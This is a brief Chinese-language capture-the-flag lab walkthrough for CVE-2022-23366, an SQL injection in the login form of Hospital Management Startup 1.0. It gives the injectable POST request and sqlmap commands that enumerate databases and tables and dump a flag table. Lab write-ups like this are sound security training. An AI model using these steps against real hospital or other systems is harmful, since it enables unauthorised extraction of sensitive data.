【春秋云境】CVE-2022-23366靶场记录

靶场介绍

Hospital Management Startup 1.0 sqli

开启靶场

POC

POST /doctorlogin.php

loginid=1&password=1&submit=Login

解题步骤

注入点在登陆处,登录用burp抓包放到sqlmap跑

【春秋云境】CVE-2022-23366靶场记录_第1张图片

通过sqlmap自动化工具测试

Sqlmap -r 目标

【春秋云境】CVE-2022-23366靶场记录_第2张图片

 查看所有数据库

Sqlmap -r 目标 --dbs

 

查看ctf数据库中的表

Sqlmap -r 目标 -D ctf --tables

【春秋云境】CVE-2022-23366靶场记录_第3张图片

 读取flag中的数据

Sqlmap -r 目标 -D ctf -T flag --dump

【春秋云境】CVE-2022-23366靶场记录_第4张图片 

你可能感兴趣的:(春秋云镜,java,前端,开发语言)